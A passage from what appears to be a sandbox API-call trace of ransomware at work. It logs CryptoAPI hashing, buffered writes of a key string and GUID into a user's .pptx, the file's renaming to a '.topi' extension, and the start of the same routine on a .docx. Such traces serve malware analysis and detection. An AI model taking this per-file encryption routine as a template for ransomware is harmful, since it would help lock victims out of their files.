PUBLIC KEY-----\\\\n") returned 492 [0094.970] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.971] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.971] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.971] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.971] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.971] GetLastError () returned 0x0 [0094.971] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.971] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.971] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.971] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.972] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6850) returned 0x99f72d8 [0094.972] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f15c0 [0094.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9258 [0094.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1608 [0094.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9270 [0094.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92a0 [0094.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92b8 [0094.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.973] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.973] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92a0 | out: hHeap=0x680000) returned 1 [0094.973] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92b8 | out: hHeap=0x680000) returned 1 [0094.973] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.973] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.973] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0094.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d92b8 [0094.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0094.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d92a0 [0094.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0094.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.973] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.973] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92b8 | out: hHeap=0x680000) returned 1 [0094.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92a0 | out: hHeap=0x680000) returned 1 [0094.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0094.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.974] GetCurrentThreadId () returned 0x8c4 [0094.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f55c0 [0094.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.974] GetCurrentThreadId () returned 0x8c4 [0094.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb510 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92a0 [0094.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0094.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92b8 [0094.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9288 [0094.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d92d0 [0094.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e68 [0094.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0094.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92a0 | out: hHeap=0x680000) returned 1 [0094.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92a0 [0094.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92a0 | out: hHeap=0x680000) returned 1 [0094.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0094.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92d0 | out: hHeap=0x680000) returned 1 [0094.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92b8 | out: hHeap=0x680000) returned 1 [0094.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9288 | out: hHeap=0x680000) returned 1 [0094.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9270 | out: hHeap=0x680000) returned 1 [0094.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1608 | out: hHeap=0x680000) returned 1 [0094.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb510 | out: hHeap=0x680000) returned 1 [0094.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0094.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0094.978] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f72d8*, nNumberOfBytesToWrite=0x6847, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f72d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x6847, lpOverlapped=0x0) returned 1 [0094.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f72d8 | out: hHeap=0x680000) returned 1 [0094.979] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x684c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.979] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.979] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.979] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.979] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.979] CloseHandle (hObject=0x6a8) returned 1 [0094.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0094.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x31cf750 [0094.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0094.983] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cT9m.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ct9m.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cT9m.pptx.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ct9m.pptx.topi")) returned 1 [0094.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.984] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b41c0 | out: hHeap=0x680000) returned 1 [0094.985] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0094.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e) returned 0x31b3f60 [0094.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.986] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned=".ini" [0094.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0094.986] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb576b3d0, ftCreationTime.dwHighDateTime=0x1d558e8, ftLastAccessTime.dwLowDateTime=0xe5da2aa0, ftLastAccessTime.dwHighDateTime=0x1d5566a, ftLastWriteTime.dwLowDateTime=0xe5da2aa0, ftLastWriteTime.dwHighDateTime=0x1d5566a, nFileSizeHigh=0x0, nFileSizeLow=0x855f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fUQVfBdmb1_EwjYXxrH.docx", cAlternateFileName="FUQVFB~1.DOC")) returned 1 [0094.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3f60 [0094.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.986] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fUQVfBdmb1_EwjYXxrH.docx") returned=".docx" [0094.986] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fUQVfBdmb1_EwjYXxrH.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fuqvfbdmb1_ewjyxxrh.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.986] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=34143) returned 1 [0094.986] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.990] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x8539, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.990] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.991] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.991] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x855f, lpOverlapped=0x0) returned 1 [0094.991] lstrlenA (lpString="-----BEGIN PUBLIC 